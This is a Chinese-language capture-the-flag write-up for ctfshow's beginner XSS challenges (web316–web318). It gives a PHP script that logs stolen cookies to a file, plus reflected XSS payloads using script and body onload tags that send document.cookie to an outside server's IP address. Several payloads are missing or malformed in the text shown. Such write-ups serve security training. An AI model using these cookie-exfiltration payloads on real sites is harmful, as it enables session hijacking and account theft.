Ctfshow web入门 XSS篇 web316-web333 详细题解 全

CTFshow XSS web316

是反射型 XSS

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第1张图片

法一:

利用现成平台

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第2张图片

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第3张图片

法二:

自己搭服务器

先在服务器上面放一个接受Cookie的文件。

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第4张图片

文件内容:


	$cookie = $_GET['cookie'];
	$time = date('Y-m-d h:i:s', time());
	$log = fopen("cookie.txt", "a");
	fwrite($log,$time.':    '. $cookie . "\n");
	fclose($log);
?>

payload:

<script>location.href="http://47.98.193.145(自己服务器的公网ip)/1111(我多建了一个文件夹)/127.php(存放上述php代码的文件)?cookie="+document.cookiescript>

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第5张图片

已经获取到Cookie了

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第6张图片

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第7张图片

之后的题都用服务器不用XSS平台了。

管理服务器我用的是xshellxftp

CTFshow XSS web317

和上一题一样的情景。

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第8张图片

测试一下过滤了script了。

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第9张图片

标签可以用 img

Payload:


Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第10张图片

CTFshow XSS web318

先进行一下测试,看看过滤了什么。

无回显

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第11张图片

无回显

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第12张图片

alert(1)有回显,可以用

Ctfshow web入门 XSS篇 web316-web333 详细题解 全_第13张图片

payload:


image-20230926200117156

这些payload也行:

<body onload="document.location.href='http://47.98.193.145/1111/127.php?1='+document.cookie">body>

<body onload="document.location.href='http://47.98.193.145/1111/127.php?1='+document.cookie">